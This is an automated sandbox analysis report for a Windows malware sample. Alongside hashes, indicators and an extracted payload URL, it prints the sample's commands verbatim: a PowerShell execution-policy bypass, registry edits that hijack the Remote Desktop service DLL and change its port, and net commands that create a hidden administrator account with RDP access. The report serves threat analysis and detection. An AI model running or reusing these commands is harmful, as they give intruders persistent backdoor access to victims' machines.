Analysis
-
max time kernel
123s -
max time network
139s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
27-06-2021 19:33
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.W32.AIDetect.malware1.29246.21787.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
SecuriteInfo.com.W32.AIDetect.malware1.29246.21787.exe
Resource
win10v20210410
General
-
Target
SecuriteInfo.com.W32.AIDetect.malware1.29246.21787.exe
-
Size
5.8MB
-
MD5
7bd36bd38e2d59e7cd840ebb5d753ed7
-
SHA1
c625e4a67c8ed11da8d2f39151d80ece4a6c1c70
-
SHA256
3e841431aaa53eb3cfa6f167b3a46bca0eb16d22e6fd1d06944414b78cc512d8
-
SHA512
9a91148a38030fab0d99ab15e3113fa8f188379b9d6618942e41e1028d6c0dc19be4e8c8f3bc1faa40a7946eb4b38202f74ef6cac59df7739e8c15783bf924ae
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
flow pid Process 17 404 powershell.exe 19 404 powershell.exe 20 404 powershell.exe 21 404 powershell.exe 23 404 powershell.exe 25 404 powershell.exe 27 404 powershell.exe 29 404 powershell.exe 31 404 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 3028 Svelta.exe.com 1308 Svelta.exe.com 4000 Svelta.exe.com -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000800000001ab80-238.dat upx behavioral2/files/0x000900000001ab8b-239.dat upx -
Deletes itself 1 IoCs
pid Process 2728 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 1364 Process not Found 1364 Process not Found -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1308 set thread context of 4000 1308 Svelta.exe.com 86 -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
description ioc Process File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICA36.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICA57.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_kqhz1eyg.e0p.psm1 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wzcexuag.a54.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICAB7.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICA67.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICAA7.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4004 reg.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3616 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2728 powershell.exe 2728 powershell.exe 2728 powershell.exe 768 powershell.exe 768 powershell.exe 768 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3052 powershell.exe 3052 powershell.exe 3052 powershell.exe 2728 powershell.exe 2728 powershell.exe 2728 powershell.exe 404 powershell.exe 404 powershell.exe 404 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 616 Process not Found 616 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2728 powershell.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeIncreaseQuotaPrivilege 768 powershell.exe Token: SeSecurityPrivilege 768 powershell.exe Token: SeTakeOwnershipPrivilege 768 powershell.exe Token: SeLoadDriverPrivilege 768 powershell.exe Token: SeSystemProfilePrivilege 768 powershell.exe Token: SeSystemtimePrivilege 768 powershell.exe Token: SeProfSingleProcessPrivilege 768 powershell.exe Token: SeIncBasePriorityPrivilege 768 powershell.exe Token: SeCreatePagefilePrivilege 768 powershell.exe Token: SeBackupPrivilege 768 powershell.exe Token: SeRestorePrivilege 768 powershell.exe Token: SeShutdownPrivilege 768 powershell.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeSystemEnvironmentPrivilege 768 powershell.exe Token: SeRemoteShutdownPrivilege 768 powershell.exe Token: SeUndockPrivilege 768 powershell.exe Token: SeManageVolumePrivilege 768 powershell.exe Token: 33 768 powershell.exe Token: 34 768 powershell.exe Token: 35 768 powershell.exe Token: 36 768 powershell.exe Token: SeDebugPrivilege 3148 powershell.exe Token: SeIncreaseQuotaPrivilege 3148 powershell.exe Token: SeSecurityPrivilege 3148 powershell.exe Token: SeTakeOwnershipPrivilege 3148 powershell.exe Token: SeLoadDriverPrivilege 3148 powershell.exe Token: SeSystemProfilePrivilege 3148 powershell.exe Token: SeSystemtimePrivilege 3148 powershell.exe Token: SeProfSingleProcessPrivilege 3148 powershell.exe Token: SeIncBasePriorityPrivilege 3148 powershell.exe Token: SeCreatePagefilePrivilege 3148 powershell.exe Token: SeBackupPrivilege 3148 powershell.exe Token: SeRestorePrivilege 3148 powershell.exe Token: SeShutdownPrivilege 3148 powershell.exe Token: SeDebugPrivilege 3148 powershell.exe Token: SeSystemEnvironmentPrivilege 3148 powershell.exe Token: SeRemoteShutdownPrivilege 3148 powershell.exe Token: SeUndockPrivilege 3148 powershell.exe Token: SeManageVolumePrivilege 3148 powershell.exe Token: 33 3148 powershell.exe Token: 34 3148 powershell.exe Token: 35 3148 powershell.exe Token: 36 3148 powershell.exe Token: SeDebugPrivilege 3052 powershell.exe Token: SeIncreaseQuotaPrivilege 3052 powershell.exe Token: SeSecurityPrivilege 3052 powershell.exe Token: SeTakeOwnershipPrivilege 3052 powershell.exe Token: SeLoadDriverPrivilege 3052 powershell.exe Token: SeSystemProfilePrivilege 3052 powershell.exe Token: SeSystemtimePrivilege 3052 powershell.exe Token: SeProfSingleProcessPrivilege 3052 powershell.exe Token: SeIncBasePriorityPrivilege 3052 powershell.exe Token: SeCreatePagefilePrivilege 3052 powershell.exe Token: SeBackupPrivilege 3052 powershell.exe Token: SeRestorePrivilege 3052 powershell.exe Token: SeShutdownPrivilege 3052 powershell.exe Token: SeDebugPrivilege 3052 powershell.exe Token: SeSystemEnvironmentPrivilege 3052 powershell.exe Token: SeRemoteShutdownPrivilege 3052 powershell.exe Token: SeUndockPrivilege 3052 powershell.exe Token: SeManageVolumePrivilege 3052 powershell.exe Token: 33 3052 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3680 wrote to memory of 392 3680 SecuriteInfo.com.W32.AIDetect.malware1.29246.21787.exe 78 PID 3680 wrote to memory of 392 3680 SecuriteInfo.com.W32.AIDetect.malware1.29246.21787.exe 78 PID 3680 wrote to memory of 392 3680 SecuriteInfo.com.W32.AIDetect.malware1.29246.21787.exe 78 PID 392 wrote to memory of 1868 392 cmd.exe 80 PID 392 wrote to memory of 1868 392 cmd.exe 80 PID 392 wrote to memory of 1868 392 cmd.exe 80 PID 1868 wrote to memory of 680 1868 cmd.exe 81 PID 1868 wrote to memory of 680 1868 cmd.exe 81 PID 1868 wrote to memory of 680 1868 cmd.exe 81 PID 1868 wrote to memory of 3028 1868 cmd.exe 82 PID 1868 wrote to memory of 3028 1868 cmd.exe 82 PID 1868 wrote to memory of 3616 1868 cmd.exe 83 PID 1868 wrote to memory of 3616 1868 cmd.exe 83 PID 1868 wrote to memory of 3616 1868 cmd.exe 83 PID 3028 wrote to memory of 1308 3028 Svelta.exe.com 84 PID 3028 wrote to memory of 1308 3028 Svelta.exe.com 84 PID 1308 wrote to memory of 4000 1308 Svelta.exe.com 86 PID 1308 wrote to memory of 4000 1308 Svelta.exe.com 86 PID 1308 wrote to memory of 4000 1308 Svelta.exe.com 86 PID 1308 wrote to memory of 4000 1308 Svelta.exe.com 86 PID 4000 wrote to memory of 2728 4000 Svelta.exe.com 87 PID 4000 wrote to memory of 2728 4000 Svelta.exe.com 87 PID 2728 wrote to memory of 3028 2728 powershell.exe 89 PID 2728 wrote to memory of 3028 2728 powershell.exe 89 PID 3028 wrote to memory of 2496 3028 csc.exe 90 PID 3028 wrote to memory of 2496 3028 csc.exe 90 PID 2728 wrote to memory of 768 2728 powershell.exe 91 PID 2728 wrote to memory of 768 2728 powershell.exe 91 PID 2728 wrote to memory of 3148 2728 powershell.exe 94 PID 2728 wrote to memory of 3148 2728 powershell.exe 94 PID 2728 wrote to memory of 3052 2728 powershell.exe 96 PID 2728 wrote to memory of 3052 2728 powershell.exe 96 PID 2728 wrote to memory of 3672 2728 powershell.exe 99 PID 2728 wrote to memory of 3672 2728 powershell.exe 99 PID 2728 wrote to memory of 4004 2728 powershell.exe 100 PID 2728 wrote to memory of 4004 2728 powershell.exe 100 PID 2728 wrote to memory of 3032 2728 powershell.exe 101 PID 2728 wrote to memory of 3032 2728 powershell.exe 101 PID 2728 wrote to memory of 2696 2728 powershell.exe 102 PID 2728 wrote to memory of 2696 2728 powershell.exe 102 PID 2696 wrote to memory of 1868 2696 net.exe 103 PID 2696 wrote to memory of 1868 2696 net.exe 103 PID 2728 wrote to memory of 2876 2728 powershell.exe 104 PID 2728 wrote to memory of 2876 2728 powershell.exe 104 PID 2876 wrote to memory of 3144 2876 cmd.exe 105 PID 2876 wrote to memory of 3144 2876 cmd.exe 105 PID 3144 wrote to memory of 3600 3144 cmd.exe 106 PID 3144 wrote to memory of 3600 3144 cmd.exe 106 PID 3600 wrote to memory of 3972 3600 net.exe 107 PID 3600 wrote to memory of 3972 3600 net.exe 107 PID 2728 wrote to memory of 4088 2728 powershell.exe 108 PID 2728 wrote to memory of 4088 2728 powershell.exe 108 PID 4088 wrote to memory of 3980 4088 cmd.exe 109 PID 4088 wrote to memory of 3980 4088 cmd.exe 109 PID 3980 wrote to memory of 3136 3980 cmd.exe 110 PID 3980 wrote to memory of 3136 3980 cmd.exe 110 PID 3136 wrote to memory of 2300 3136 net.exe 111 PID 3136 wrote to memory of 2300 3136 net.exe 111 PID 3716 wrote to memory of 2692 3716 cmd.exe 115 PID 3716 wrote to memory of 2692 3716 cmd.exe 115 PID 2692 wrote to memory of 2096 2692 net.exe 116 PID 2692 wrote to memory of 2096 2692 net.exe 116 PID 3812 wrote to memory of 3956 3812 cmd.exe 119 PID 3812 wrote to memory of 3956 3812 cmd.exe 119
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.W32.AIDetect.malware1.29246.21787.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.W32.AIDetect.malware1.29246.21787.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Capace.tiff2⤵
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\SysWOW64\cmd.execmd3⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^VVQakpNKMLUfqoLVVhmjKCivrTyOgozXYJsboinGHQXJWaqRDprwktizOzfarZcDsWdsQhNOPTFUEbAKThltyaMTBYIORuCHxxsZeIwdvfjamhPsTFmPPdbZlbPSFYWIsXmlyAIljUI$" Sai.tiff4⤵PID:680
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Svelta.exe.comSvelta.exe.com S4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Svelta.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Svelta.exe.com S5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Svelta.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Svelta.exe.com6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'7⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\evd0idau\evd0idau.cmdline"8⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES928C.tmp" "c:\Users\Admin\AppData\Local\Temp\evd0idau\CSC7E94C254BB0D4788ABCC8C5447DB1BDC.TMP"9⤵PID:2496
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f8⤵PID:3672
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f8⤵
- Modifies registry key
PID:4004
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f8⤵PID:3032
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add8⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add9⤵PID:1868
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr8⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\system32\cmd.execmd /c net start rdpdr9⤵
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\system32\net.exenet start rdpdr10⤵
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr11⤵PID:3972
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService8⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\system32\cmd.execmd /c net start TermService9⤵
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\system32\net.exenet start TermService10⤵
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService11⤵PID:2300
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f8⤵PID:2252
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f8⤵PID:1884
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 304⤵
- Runs ping.exe
PID:3616
-
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵PID:2096
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc lLB8vtKv /add1⤵
- Suspicious use of WriteProcessMemory
PID:3812 -
C:\Windows\system32\net.exenet.exe user wgautilacc lLB8vtKv /add2⤵PID:3956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc lLB8vtKv /add3⤵PID:3976
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵PID:1396
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵PID:2492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:2252
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵PID:2244
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵PID:3628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵PID:2972
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵PID:4056
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵PID:2164
-
